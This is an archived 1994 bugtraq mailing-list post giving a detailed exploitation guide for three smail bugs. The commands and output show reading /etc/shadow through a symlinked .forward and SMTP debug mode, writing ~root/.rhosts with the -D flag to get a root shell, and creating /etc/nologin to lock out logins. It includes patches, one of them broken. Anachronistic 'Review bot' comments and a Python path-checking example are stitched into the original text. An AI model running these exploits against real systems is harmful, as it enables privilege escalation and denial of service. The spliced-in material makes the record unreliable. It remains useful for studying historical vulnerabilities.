[39] in bugtraq
Earlier mail from the bugtraq mailing list... forwarded.
wchuang@ATHENA.MIT.EDU (wchuang@ATHENA.MIT.EDU)
Tue Oct 18 18:45:56 1994
Received: from PACIFIC-CARRIER-ANNEX.MIT.EDU by po6.MIT.EDU (5.61/4.7) id AA18183; Sun, 9 Oct 94 09:09:33 EDT
Received: from villa.fc.net by MIT.EDU with SMTP
id AA23813; Sun, 9 Oct 94 09:09:33 EDT
Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by villa.fc.net (8.6.8.1/8.6.6) with ESMTP id CAA15079 for <bugtraq-outgoing@villa.fc.net>; Sun, 9 Oct 1994 02:14:24 -0500
Received: (from majordom@localhost) by freeside.fc.net (8.6.8.1/8.6.6) id CAA07742 for bugtraq-outgoing@villa.fc.net; Sun, 9 Oct 1994 02:15:22 -0500
Received: from altair.csustan.edu (altair.csustan.edu [130.17.1.50]) by freeside.fc.net (8.6.8.1/8.6.6) with SMTP id CAA07722 for <bugtraq@fc.net>; Sun, 9 Oct 1994 02:14:53 -0500
Received: by altair.csustan.edu (4.1/1.12)
id AA29110; Sun, 9 Oct 94 00:09:02 PDT
Date: Sun, 9 Oct 94 00:09:02 PDT
From: xcelsior@altair.csustan.edu (Excelsior)
Message-Id: <9410090709.AA29110@altair.csustan.edu>
To: bugtraq@fc.net
Subject: Re: 3 SMAIL BUGS
Sender: bugtraq-owner@crimelab.com
Precedence: bulk
aleph1@dfw.net (Aleph One) spewed....
>Ok for all of you asking which are the 3
>here is the count down:
>
>Number 3 - The SMTP DEBUG problem. Anyone can
> telnet to your SMTP port and read any
> file on the system.
You are exaggerating the problem. To exploit this, you have to have
an account on the local machine (in order to create the ~/.forward
link). Not just "anyone" can exploit it.
> Fixed by adding
> -smtp_debug in your smail config file.
Wrong wrong wrong! All the -smtp_debug flag does is keep you from
exploiting it by telnetting directly to the smtp port. There is
an easier way to exploit it.
>Number 2 - The .forward problem. Another
> configuration problem. Smail does not
> check file attributes when delivering mail
^^^^^^^^^^^^^^
Wrong again. It does check the file attributes, but not the attributes
of the DIRECTORY you are trying to create the file in - thus causing
the problem.
> to a file pointed to by a .forward. Fixed
> by adding the check_path attribute to the
> forward file director.
>
>and
>
>Number 1 - Debug file bug. Smail creates or appends to
> any file using the debug options!
How about explaining those bugs in detail? If I wanted to hear
"There is a bug" with no explanation, I'd read CERT. Maybe
you don't know how the bugs work, but if you do, don't be a WUSS
- post it!
>There. What I said will fix #1 and #2.
Nope, what you said will definitely NOT fix #1 or #3. You can fix
#2 as you described, but you weren't very specific about it, were you?
> Several different
> patches have been posted for #3 on usenet. Check
> comp.mail.smail and the comp.is.linux.* newsgroups.
> Also the maintainers of smail will fixed RSN.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Isn't that a little harsh? How about just giving them a course in
writing secure Setuid programs. :)
Ok, now everyone repeat after me:
BUGTRAQ IS A FULL DISCLOSURE LIST
That's right. FULL disclosure. Since all the elite cracker pussies
are too scared to describe their bugs in detail, I will. I am
including a security doc on smail that I wrote a little while ago.
I'm sure most of the cracker dudes got it from my DocServer and FTP
site, so here it comes to the rest of you. I hope this encourages
more people to stop being childish and post your bugs. I'll be
posting more goodies from my archives soon as well.
Share and enjoy.... :)
-------------------------------------------------
EXCELSIOR'S GUIDE TO SMAIL BUGS - Sept 1994
***
Bug #1
***
SYNOPSIS
--------
Use of ~/.forward and debug lets a local user read any file on the system.
EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> ln -s /etc/shadow .forward
loser@possesux ~> ls -la .forward
lrwxrwxrwx 1 loser users 11 Sep 5 12:08 .forward -> /etc/shadow
loser@possesux ~> telnet localhost smtp
Trying 127.0.0.1...
Connected to localhost-gw.
Escape character is '^]'.
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10 PDT
debug 20
250 Debugging level: 20
expn loser
[lots of crap]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more crap]
read 890 bytes
director dotforward: matched loser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection
Connection closed by foreign host.
---------------
Contrary to popular belief, adding -smtp_debug to your smail config file
will NOT prevent this bug from occurring. It will just prevent exploitation
via the smtp port.
We can just do this....
----------
loser@possesux ~> smail -bs -v20
expand_string($primary_name Smail$version ready for fakemail on $date,(null),(null)) called
expand_string returns possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT
expn loser
[same crap as before]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more of same crap]
read 890 bytes
director dotforward: matched loser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[.....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection
----------
The easy way to fix this is to nuke the -d and -v options from smail.
***
Bug #2
***
SYNOPSIS
--------
Smail called with the -D flag will allow you to create and append to any
file on the system.
EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> cat ~/.forward
localhost loser
^D
loser@possesux ~> smail -bs -D ~root/.rhosts -v20
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23 PDT
expn loser
250 loser
quit
221 possesux.warez.mil closing connection
loser@possesux ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)
--------------
Neat, huh? Patch by nuking the -D option from smail.
I received the following patch recently. I haven't tested it, so use
at your own risk.
*** Omain.c Wed Mar 11 12:33:18 1993
--- main.c Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
}
- /*
- * change error file to debugging file from -D option, if any
- */
-
- if (arg_debug_file) {
- new_errfile = fopen(arg_debug_file, "a");
- if (new_errfile == NULL) {
- write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
- arg_debug_file, strerrno(errno));
- arg_debug_file = NULL;
- } else {
- errfile = new_errfile;
- fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
- program, (long)getpid());
- }
- }
-
- /*
* read in the transport, router and director files, if needed
*
* NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
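Review bot: the final removed line of this hunk, `- /*`, is the opening of the comment that the unchanged context `* read in the transport, router and director files, if needed` belongs to; deleting it leaves that comment block unopened and main.c will no longer compile. That `/*` should be kept as unchanged context, with the removal ending at the blank line after the closing `}` of the `if (arg_debug_file)` block. Moving the -D handling out of the section that still runs with the setuid privileges is otherwise the right direction.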
***************
*** 525,530 ****
--- 508,537 ----
if (prog_euid != REQUIRED_EUID)
queue_only = TRUE;
#endif
+
+ /*
+ * change error file to debugging file from -D option, if any
+ *
+ * JMJ: Change location of this fragment to below the setuid/setgid
+ * calls to allow for use of fopen_as_user() instead of just
+ * fopen().
+ *
+ * Side effect: -D now requires full pathname to debug file
+ */
+
+ if (arg_debug_file) {
+ new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid,
+ prog_egid, 0600);
+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+ arg_debug_file, strerrno(errno));
+ arg_debug_file = NULL;
+ } else {
+ errfile = new_errfile;
+ fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
+ program, (long)getpid());
+ }
+ }
/*
* error processing can be other than TERMINAL only for
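Review bot: the NULL test after the `fopen_as_user(...)` call is missing. As shown, `write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n", ...)` and `arg_debug_file = NULL;` run unconditionally, the `} else {` has no `if` to pair with, and the two closing `+ }` lines do not balance the braces; this looks like a dropped `if (new_errfile == NULL) {` line, possibly lost in transcription, and it should be restored so the `errfile = new_errfile;` branch is reached on success. The substantive change is sound: opening the debug file with fopen_as_user() under real_uid and mode 0600, after the setuid/setgid calls, means the file is created or appended with the invoking user's permissions rather than root's, which is what closes bug #2 (no more writing ~root/.rhosts). The side effect noted in the comment, that -D now requires a full pathname, belongs in the documentation for the option as well.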
--
***
Bug #3
***
SYNOPSIS
--------
Files specified in ~/.forward can be created in any directory, regardless
of its permissions. (File is still owned by mailbox owner, however.)
EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> echo "/etc/nologin" > ~/.forward
loser@possesux ~> mail -r root loser < /dev/null
loser@possesux ~> echo "Site shutdown due to smail lameness" >! /etc/nologin
loser@possesux ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.
---------
Plug up this hole by adding 'check_path' to the following part of
your /usr/lib/smail/transports file:
---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file: driver = appendfile,
return_path, local, from, unix_from_hack;
file = $user, # file is taken from address
append_as_user, # use user-id associated with address
expand_user, # expand ~ and $ within address
check_path, #<--add this line
suffix = "\n",
mode = 0644
[...]
---
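The fix for bugs #1 and #3 above comes down to one idea: before root's delivery agent follows a path that an unprivileged user chose, every component of that path has to be checked with the user's permissions, not root's. What follows is an added example, not smail's own code and not the real implementation behind the `check_path` attribute; it models that check in Python so it can be run against a constructed directory tree. The uids, gids and the tree (possesux's /etc, /home/loser and the .forward -> /etc/shadow symlink from the bug #1 transcript) are assumptions built inline, and `fake_lstat` stands in for `os.lstat`.

```python
"""Added example (not smail's code): the two path checks that close the
.forward holes. check_forward_file() models refusing a ~/.forward that is a
symlink (bug #1); check_path() models the appendfile transport's check_path
idea (bug #3). Both examine every component with lstat *as the unprivileged
user*, never as root. The stat source is injectable so this runs offline."""
import os
import stat
from collections import namedtuple

# Minimal stat record; real os.lstat results carry the same attribute names.
Ent = namedtuple("Ent", "st_mode st_uid st_gid")


def _perm(ent, uid, gids, usr, grp, oth):
    """POSIX permission test for an unprivileged user on one inode."""
    if ent.st_uid == uid:
        return bool(ent.st_mode & usr)
    if ent.st_gid in gids:
        return bool(ent.st_mode & grp)
    return bool(ent.st_mode & oth)


def can_write(ent, uid, gids):
    return _perm(ent, uid, gids, stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)


def can_search(ent, uid, gids):
    return _perm(ent, uid, gids, stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH)


def check_forward_file(path, uid, lstat=os.lstat):
    """Bug #1: refuse a ~/.forward that is a symlink, not a regular file, or
    not owned by the user whose mail is being expanded. Returns (ok, reason)."""
    try:
        ent = lstat(path)
    except FileNotFoundError:
        return True, "no .forward"  # nothing to expand, nothing to leak
    if stat.S_ISLNK(ent.st_mode):
        return False, "%s: symlink refused" % path
    if not stat.S_ISREG(ent.st_mode):
        return False, "%s: not a regular file" % path
    if ent.st_uid != uid:
        return False, "%s: not owned by uid %d" % (path, uid)
    return True, "ok"


def check_path(path, uid, gids, lstat=os.lstat):
    """Bug #3: may unprivileged `uid` append to or create `path`?
    Intermediate components must be searchable directories, no component may
    be a symlink, and the final component must be writable, or, if absent,
    its parent directory must be writable. That last rule is the one smail
    skipped, which let a user create /etc/nologin. Returns (ok, reason)."""
    if not os.path.isabs(path):
        return False, "%s: not absolute" % path
    parts = [p for p in path.split("/") if p]
    if not parts:
        return False, "refusing /"
    cur = "/"
    for i, name in enumerate(parts):
        parent, cur = cur, os.path.join(cur, name)
        last = i == len(parts) - 1
        try:
            ent = lstat(cur)
        except FileNotFoundError:
            if not last:
                return False, "%s: no such directory" % cur
            if not can_write(lstat(parent), uid, gids):
                return False, "%s: uid %d may not create files here" % (parent, uid)
            return True, "ok (may create %s)" % cur
        if stat.S_ISLNK(ent.st_mode):
            return False, "%s: symlink refused" % cur
        if not last:
            if not stat.S_ISDIR(ent.st_mode):
                return False, "%s: not a directory" % cur
            if not can_search(ent, uid, gids):
                return False, "%s: uid %d may not search" % (cur, uid)
        elif not can_write(ent, uid, gids):
            return False, "%s: uid %d may not write" % (cur, uid)
    return True, "ok (may append to %s)" % path


# Constructed tree standing in for possesux: uid 1000 is "loser" (group 100,
# users); root owns /etc and /etc/shadow; .forward is the symlink to
# /etc/shadow from the bug #1 transcript. All values are assumptions.
TREE = {
    "/":                      Ent(stat.S_IFDIR | 0o755, 0, 0),
    "/etc":                   Ent(stat.S_IFDIR | 0o755, 0, 0),
    "/etc/shadow":            Ent(stat.S_IFREG | 0o600, 0, 0),
    "/home":                  Ent(stat.S_IFDIR | 0o755, 0, 0),
    "/home/loser":            Ent(stat.S_IFDIR | 0o755, 1000, 100),
    "/home/loser/.forward":   Ent(stat.S_IFLNK | 0o777, 1000, 100),
    "/home/loser/Mail":       Ent(stat.S_IFDIR | 0o700, 1000, 100),
    "/home/loser/Mail/inbox": Ent(stat.S_IFREG | 0o644, 1000, 100),
}


def fake_lstat(path):
    """Stand-in for os.lstat over the constructed tree."""
    try:
        return TREE[path]
    except KeyError:
        raise FileNotFoundError(path) from None


if __name__ == "__main__":
    print(check_forward_file("/home/loser/.forward", 1000, fake_lstat))
    for target in ("/etc/nologin", "/etc/shadow",
                   "/home/loser/Mail/inbox", "/home/loser/Mail/outbox"):
        print(target, check_path(target, 1000, {100}, fake_lstat))
```

Run it as a script to see each verdict; with `lstat` left at its default of `os.lstat` the same functions walk a real filesystem. The branch to watch is the `FileNotFoundError` case in `check_path`: when the final component does not exist yet, the parent directory's write bit for the delivering user decides, which is exactly the test whose absence let `loser` create /etc/nologin.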
That's it for now. If you appreciated reading this file, then consider
posting your exploitation scripts too.
Share and enjoy!
- Excelsior